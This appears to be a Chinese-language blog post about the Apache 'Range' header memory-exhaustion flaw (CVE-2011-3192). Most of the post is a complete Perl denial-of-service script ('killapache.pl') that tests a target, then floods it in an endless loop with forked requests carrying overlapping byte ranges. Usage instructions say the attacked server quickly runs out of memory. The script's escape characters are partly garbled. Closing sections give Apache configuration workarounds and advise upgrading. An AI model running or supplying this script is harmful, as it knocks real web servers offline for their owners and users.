apache服务器内存杀手攻击代码及防范方法

全系列的apache版本1.3及2.x都存在此问题
Versions: Apache 1.3 all versions, Apache 2 all versions

攻击的perl 代码如下
use IO::Socket;
use Parallel::ForkManager;

sub usage {
print “Apache Remote Denial of Service (memory exhaustion)n”;
print “by Kingcopen”;
print “usage: perl killapache.pl [numforks]n”;
print “example: perl killapache.pl www.example.com 50n”;
}

sub killapache {
print “ATTACKING $ARGV[0] n”;

$pm = new Parallel::ForkManager($numforks);

$|=1;
srand(time());
$p = “”;
for ($k=0;$k<1300;$k++) {
$p .= “,5-$k”;
}

for ($k=0;$k<$numforks;$k++) {
my $pid = $pm->start and next;

$x = “”;
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => “80″,
Proto => ‘tcp’);

$p = “HEAD / HTTP/1.1rnHost: $ARGV[0]rnRange:bytes=0-$prnAccept-Encoding: gziprnConnection: closernrn”;
print $sock $p;

while(<$sock>) {
}
$pm->finish;
}
$pm->waitallchildren;
print “:pPpPpppPpPPppPpppPpn”;
}

sub testapache {
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => “80″,
Proto => ‘tcp’);

$p = “HEAD / HTTP/1.1rnHost: $ARGV[0]rnRange:bytes=0-$prnAccept-Encoding: gziprnConnection: closernrn”;
print $sock $p;

$x = <$sock>;
if ($x =~ /Partial/) {
print “host seems vulnn”;
return 1;
} else {
return 0;
}
}

if ($#ARGV < 0) {
usage;
exit;
}

if ($#ARGV > 1) {
$numforks = $ARGV[1];
} else {$numforks = 50;}

$v = testapache();
if ($v == 0) {
print “Host does not seem vulnerablen”;
exit;
}
while(1) {
killapache();
}

保存为killapache.pl
在linux下使用perl killapache.pl www.example.com 50
即可发可以攻击,被攻击的服务器很短时间内存就会全部用完,服务器失出响应
临时可以使用如下方法限制
Apache 2.0 and 2.2等版本
# Drop the Range header when more than 5 ranges.
# CVE-2011-3192
SetEnvIf Range (,.*?){5,} bad-range=1
RequestHeader unset Range env=bad-range

optional logging.

CustomLog logs/range-CVE-2011-3192.log common env=bad-range

Apache 1.3系列版本

Reject request when more than 5 ranges in the Range: header.

# CVE-2011-3192
#
RewriteEngine on
RewriteCond %{HTTP:range} !(^bytes=[^,]+(,[^,]+){0,4}$|^$)
RewriteRule .* – [F]
最好还赶快升级你的apache吧,apache官方已紧急更新了apache版本

参考资料

http://www.exploit-db.com/exploits/17696/
http://lwn.net/Articles/456268/